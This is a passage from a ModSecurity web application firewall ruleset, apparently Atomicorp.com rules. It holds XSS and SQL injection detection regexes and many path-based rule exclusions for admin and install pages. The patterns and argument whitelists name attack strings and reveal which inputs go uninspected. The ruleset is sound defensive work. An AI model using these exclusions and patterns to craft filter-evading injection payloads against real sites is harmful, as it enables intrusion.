?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" 	"phase:2,deny,log,auditlog,status:403,chain,t:none,t:removeNulls,t:urlDecodeUni,t:replaceComments,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,capture,id:341149,rev:112,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
SecRule ARGS "!(^(submit(\+| )>>|>>)$)" "t:none,t:lowercase"

SecMarker END_RULES_91466

SecRule REQUEST_FILENAME "/cgi-bin/cp-admin\.cgi" "phase:2,id:91467,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/_admin/" "phase:2,id:91468,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/siteadmin/" "phase:2,id:91469,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cmsadmin/" "phase:2,id:91470,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/forumadmin/" "phase:2,id:91471,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/management/" "phase:2,id:91472,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/manager/" "phase:2,id:91473,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/edit_product" "phase:2,id:91474,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/rssadmin/" "phase:2,id:91475,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/order/input\.php" "phase:2,id:91476,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91477,t:none,pass,nolog,skipAfter:END_RULES_91477"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/page/|!ARGS:order|!ARGS:youtube|!ARGS:reply|!ARGS:/^B/|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/product_desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:/descr/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,id:341823,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/^B/|!ARGS:order|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/product_desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:/descr/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame)" 	"phase:2,deny,log,auditlog,status:403,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340824,rev:33,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"

SecMarker END_RULES_91477

SecRule REQUEST_FILENAME "/ftp/index\.php" "phase:2,id:91478,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340144"
SecAction "phase:2,id:91479,t:none,pass,nolog,skipAfter:END_RULES_91479"

SecRule ARGS|!ARGS:state|!ARGS:postpagetext|!ARGS:display_query|!ARGS:Db_submit|!ARGS:prev_sql_query|!ARGS:sql_query|!ARGS:Post|!ARGS:text|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:message|!ARGS:/^SQL/|!ARGS:query_string|!ARGS:query|!ARGS:description "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)"  	"t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,phase:2,deny,log,auditlog,status:403,id:340825,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2'"

SecMarker END_RULES_91479

SecRule REQUEST_FILENAME "/editfield\.php" "phase:2,id:91480,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin1/" "phase:2,id:91481,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/edit/index\.php" "phase:2,id:91482,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/ticketreply\.php" "phase:2,id:91483,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340144"
SecAction "phase:2,id:91484,t:none,pass,nolog,skipAfter:END_RULES_91484"

SecRule ARGS|!ARGS:reply|!ARGS:postpagetext|!ARGS:display_query|!ARGS:Db_submit|!ARGS:prev_sql_query|!ARGS:sql_query|!ARGS:Post|!ARGS:text|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:message|!ARGS:/^SQL/|!ARGS:query_string|!ARGS:query|!ARGS:description "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=|union all select |union select [a-z][0-9]+ )"  	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:340852,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2'"

SecMarker END_RULES_91484

SecRule REQUEST_FILENAME "/tiny_mce/plugins/advlink/link\.htm" "phase:2,id:91485,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/webadmin/" "phase:2,id:91486,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/front_content\.php" "phase:2,id:91487,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/main/" "phase:2,id:91488,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340017"

SecRule REQUEST_FILENAME "/install/" "phase:2,id:91489,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/formmail\.conf" "phase:2,id:91490,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340017"
SecAction "phase:2,id:91491,t:none,pass,nolog,skipAfter:END_RULES_91491"

SecRule ARGS|!ARGS:CompanyType|!ARGS:ncontent|!ARGS:/body/|!ARGS:/content/|!ARGS:searchword|!ARGS:add_keywords|!ARGS:comments|!ARGS:text|!ARGS:/description/|!ARGS:/^sql/|!ARGS:/products_description/|!ARGS:contactMessage|!ARGS:cts|!ARGS:meta_descr|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:description|!ARGS:introtext|!ARGS:Post|!ARGS:sql_query|!ARGS:itembigtext|!ARGS:article_content|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:general[description]|!ARGS:response[14]|!ARGS:article|!ARGS:wptextbox1 "(?:insert into values|select from [a-z|0-9]|bulk insert |union select |union all select|convert \(.*from)"  	"t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,phase:2,deny,log,auditlog,status:403,id:340826,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection in ARGS'"

SecMarker END_RULES_91491

SecRule REQUEST_FILENAME "/wizard/pages" "phase:2,id:91492,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/email\.php" "phase:2,id:91493,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/dict\.php" "phase:2,id:91494,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91495,t:none,pass,nolog,skipAfter:END_RULES_91495"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:request|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:340827,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:request|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:340828,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"

SecMarker END_RULES_91495

SecRule REQUEST_FILENAME "/webadmin\.php" "phase:2,id:91496,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"

SecRule REQUEST_FILENAME "/ntunnel_mysql\.ph" "phase:2,id:91497,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019"


SecRule REQUEST_FILENAME "/planner\.php" "phase:2,id:91498,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:91499,t:none,pass,nolog,skipAfter:END_RULES_91499"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:title|!ARGS:request|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340829,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:title|!ARGS:request|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340830,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"

SecMarker END_RULES_91499

SecRule REQUEST_FILENAME "/facebook/" "phase:2,id:91500,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/install2\.php" "phase:2,id:91501,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"

SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:91502,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"

SecRule REQUEST_FILENAME "/stream/index\.php" "phase:2,id:91503,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340018"

SecRule REQUEST_FILENAME "/secure\.php" "phase:2,id:91504,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709"

